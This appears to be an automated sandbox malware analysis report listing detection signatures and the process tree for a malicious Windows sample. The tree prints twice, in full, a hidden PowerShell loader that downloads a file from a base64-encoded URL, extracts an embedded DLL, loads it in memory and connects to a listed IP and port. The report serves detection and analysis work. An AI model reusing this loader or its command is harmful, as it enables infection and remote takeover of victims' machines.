Edit tour
Windows
Analysis Report
Overview
Detection
Score: | 88 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Malicious sample detected (through community Yara rule)
Sigma detected: Powershell download and load assembly
Yara detected Powershell download and execute
Bypasses PowerShell execution policy
Found suspicious powershell code related to unpacking or dynamic code loading
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Suspicious command line found
Suspicious powershell command line found
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Usage Of Web Request Commands And Cmdlets
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match
Classification
- System is w10x64
- cmd.exe (PID: 7040 cmdline:
cmd /C "po wershell - ExecutionP olicy Bypa ss -Window Style Hidd en -Comman d "$base64 Url = 'aHR 0cHM6Ly8zM TA1LmZpbGV tYWlsLmNvb S9hcGkvZml sZS9nZXQ/Z mlsZWtleT1 tTDJfVG5JR 0tRcW9jQjZ 6THZjdk42O FRxX0ZwZkM 0R2g4VkNnc 3pfaURocVU zVVhfSF9ve HYzY1V5c09 VTHBNJnBrX 3ZpZD1mZDR mNjE0YmIyM DljNjJjMTc zMDg1MTQ3M GEwOTA0Zg= ='; $url = [System.T ext.Encodi ng]::UTF8. GetString( [System.Co nvert]::Fr omBase64St ring($base 64Url)); $ webClient = New-Obje ct System. Net.WebCli ent; $imag eBytes = $ webClient. DownloadDa ta($url); $imageText = [System .Text.Enco ding]::UTF 8.GetStrin g($imageBy tes); $sta rtFlag = ' <<BASE64_S TART>>'; $ endFlag = '<<BASE64_ END>>'; $s tartIndex = $imageTe xt.IndexOf ($startFla g); $endIn dex = $ima geText.Ind exOf($endF lag); $sta rtIndex -g e 0 -and $ endIndex - gt $startI ndex; $sta rtIndex += $startFla g.Length; $base64Len gth = $end Index - $s tartIndex; $base64Co mmand = $i mageText.S ubstring($ startIndex , $base64L ength); $d llBytes = [Convert]: :FromBase6 4String($b ase64Comma nd); $asse mbly = [Sy stem.Refle ction.Asse mbly]::Loa d($dllByte s); [Stub. main]::Mai n('87.120. 116.179', '1300');" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - conhost.exe (PID: 7160 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - powershell.exe (PID: 6564 cmdline:
powershell -Executi onPolicy B ypass -Win dowStyle H idden -Com mand "$bas e64Url = ' aHR0cHM6Ly 8zMTA1LmZp bGVtYWlsLm NvbS9hcGkv ZmlsZS9nZX Q/ZmlsZWtl eT1tTDJfVG 5JR0tRcW9j QjZ6THZjdk 42OFRxX0Zw ZkM0R2g4Vk Nnc3pfaURo cVUzVVhfSF 9veHYzY1V5 c09VTHBNJn BrX3ZpZD1m ZDRmNjE0Ym IyMDljNjJj MTczMDg1MT Q3MGEwOTA0 Zg=='; $ur l = [Syste m.Text.Enc oding]::UT F8.GetStri ng([System .Convert]: :FromBase6 4String($b ase64Url)) ; $webClie nt = New-O bject Syst em.Net.Web Client; $i mageBytes = $webClie nt.Downloa dData($url ); $imageT ext = [Sys tem.Text.E ncoding]:: UTF8.GetSt ring($imag eBytes); $ startFlag = '<<BASE6 4_START>>' ; $endFlag = '<<BASE 64_END>>'; $startInd ex = $imag eText.Inde xOf($start Flag); $en dIndex = $ imageText. IndexOf($e ndFlag); $ startIndex -ge 0 -an d $endInde x -gt $sta rtIndex; $ startIndex += $start Flag.Lengt h; $base64 Length = $ endIndex - $startInd ex; $base6 4Command = $imageTex t.Substrin g($startIn dex, $base 64Length); $dllBytes = [Conver t]::FromBa se64String ($base64Co mmand); $a ssembly = [System.Re flection.A ssembly]:: Load($dllB ytes); [St ub.main]:: Main('87.1 20.116.179 ', '1300') ; MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
- cleanup
⊘No configs have been found
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security | ||
INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC | Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | ditekSHen |
|
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security |
System Summary |
---|
Source: | Author: Florian Roth (Nextron Systems): |